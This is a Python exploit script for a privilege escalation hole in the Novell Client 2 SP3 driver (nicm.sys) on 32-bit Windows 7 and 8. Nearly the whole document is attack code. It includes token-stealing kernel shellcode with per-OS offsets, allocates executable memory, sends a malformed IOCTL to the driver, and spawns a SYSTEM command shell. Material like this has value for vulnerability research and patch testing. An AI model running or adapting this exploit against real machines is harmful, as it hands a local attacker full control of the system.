Novell Client 2 SP3 Privilege Escalation

`# Novell Client 2 SP3 Privilege escalation exploit  
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0  
# Thanks to Master Ryujin :)  
  
# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather there was anything else public)  
# Exploit for DEMO purposes :)  
# Does not bypass SMEP on Windows 8  
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/  
  
from ctypes import *  
import sys,struct,os  
from optparse import OptionParser  
  
kernel32 = windll.kernel32  
ntdll = windll.ntdll  
  
if __name__ == '__main__':  
  
usage = "%prog -o <target>"  
parser = OptionParser(usage=usage)  
parser.add_option("-o", type="string",  
action="store", dest="target_os",  
help="Available target operating systems: WIN7, WIN8")  
(options, args) = parser.parse_args()  
OS = options.target_os  
if not OS or OS.upper() not in ['WIN7','WIN8']:  
parser.print_help()  
sys.exit()  
OS = OS.upper()  
  
if OS == "WIN7":  
_KPROCESS = "\x50" # Offset for Win7  
_TOKEN = "\xf8" # Offset for Win7  
_UPID = "\xb4" # Offset for Win7  
_APLINKS = "\xb8" # Offset for Win7  
  
steal_token = "\x52" +\  
"\x53" +\  
"\x33\xc0" +\  
"\x64\x8b\x80\x24\x01\x00\x00" +\  
"\x8b\x40" + _KPROCESS +\  
"\x8b\xc8" +\  
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\  
"\x89\x1d\x00\x09\x02\x00" +\  
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\  
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\  
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\  
"\x75\xe8" +\  
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\  
"\x8b\xc1" +\  
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\  
"\x5b" +\  
"\x5a" +\  
"\xc2\x08"  
  
sc = steal_token   
  
else:  
_KPROCESS = "\x80" # Offset for Win8  
_TOKEN = "\xEC" # Offset for Win8  
_UPID = "\xB4" # Offset for Win8  
_APLINKS = "\xB8" # Offset for Win8  
  
steal_token = "\x52" +\  
"\x53" +\  
"\x33\xc0" +\  
"\x64\x8b\x80\x24\x01\x00\x00" +\  
"\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\  
"\x8b\xc8" +\  
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\  
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\  
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\  
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\  
"\x75\xe8" +\  
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\  
"\x8b\xc1" +\  
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\  
"\x5b" +\  
"\x5a" +\  
"\xc2\x08"  
  
sc = steal_token  
  
  
kernel_sc = "\x14\x00\x0d\x0d"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x18\x00\x0d\x0d"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x28\x00\x0d\x0d"  
kernel_sc+= sc  
  
  
print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."  
print "[>] Finding the driver."  
  
GENERIC_READ = 0x80000000  
GENERIC_WRITE = 0x40000000  
OPEN_EXISTING = 0x3  
DEVICE = '\\\\.\\nicm'  
  
device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)  
EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL  
retn = c_ulong()  
  
inut_buffer = 0x0d0d0000  
inut_size = 0x14  
output_buffer = 0x0  
output_size = 0x0  
  
baseadd = c_int(0x0d0d0000)  
  
MEMRES = (0x1000 | 0x2000)  
PAGEEXE = 0x00000040  
Zero_Bits = c_int(0)  
RegionSize = c_int(0x1000)  
write = c_int(0)  
  
print "[>] Allocating memory for our shellcode."  
dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)  
print "[>] Writing the shellcode."  
kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))  
  
if device_handler:  
print "[>] Sending IOCTL to the driver."  
dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)  
  
print "[>] Dropping to a SYSTEM shell."  
os.system("cmd.exe /K cd C:\\windows\\system32")  
  
  
`